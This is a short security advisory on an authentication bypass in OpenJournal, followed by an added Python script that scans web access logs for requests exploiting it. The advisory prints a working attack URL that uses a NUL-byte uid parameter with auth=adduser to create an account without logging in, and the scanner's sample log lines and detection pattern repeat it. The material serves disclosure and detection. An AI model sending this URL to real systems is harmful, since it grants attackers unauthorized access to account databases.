OpenJournal Authentication Bypassing Vulnerability

No exploit is required to leverage this issue. The following URI will allow an attacker to gain access to the software's account database:

http://www.test.com/cgi-bin/oj.cgi?db=default&uid=%00&userid=hacker&auth=adduser
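
A log check for requests shaped like the URI above, as an added example that is not part of the original advisory: it flags requests to oj.cgi whose uid parameter decodes to a control character such as the NUL byte (%00), and rates them higher when auth=adduser is also present. The access-log format, the sample lines, the severity labels and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format, documentation IP range).
# Only the second line mirrors the advisory URI; the other values are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/oj.cgi?db=default&uid=alice&auth=view HTTP/1.0" 200 512',
    '192.0.2.77 - - [01/Jan/2010:10:00:05 +0000] "GET /cgi-bin/oj.cgi?db=default&uid=%00&userid=hacker&auth=adduser HTTP/1.0" 200 734',
    '192.0.2.78 - - [01/Jan/2010:10:00:09 +0000] "GET /cgi-bin/oj.cgi?db=default&uid=%00&auth=view HTTP/1.0" 200 120',
    '192.0.2.12 - - [01/Jan/2010:10:01:00 +0000] "GET /index.html HTTP/1.0" 200 90',
]

# client, ident, user, [timestamp], "METHOD target ...", status
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')
# NUL and the other ASCII control characters, checked after URL-decoding.
CONTROL_RE = re.compile(r'[\x00-\x1f\x7f]')


def inspect_line(line):
    """Return a finding dict for a suspicious oj.cgi request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/oj.cgi'):
        return None
    # parse_qs percent-decodes values, so uid=%00 becomes '\x00'.
    params = parse_qs(parts.query, keep_blank_values=True)
    if not any(CONTROL_RE.search(u) for u in params.get('uid', [])):
        return None
    adduser = 'adduser' in params.get('auth', [])
    return {
        'client': client,
        'status': int(status),
        'severity': 'high' if adduser else 'medium',  # labels are assumptions
        'userid': params.get('userid', [None])[0],
    }


def scan(lines):
    """Inspect every log line and return the list of findings."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request is worth following up against the application's account list, since the `userid` value in the finding names the account the request referred to.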


 

Copyright 2010, SecurityFocus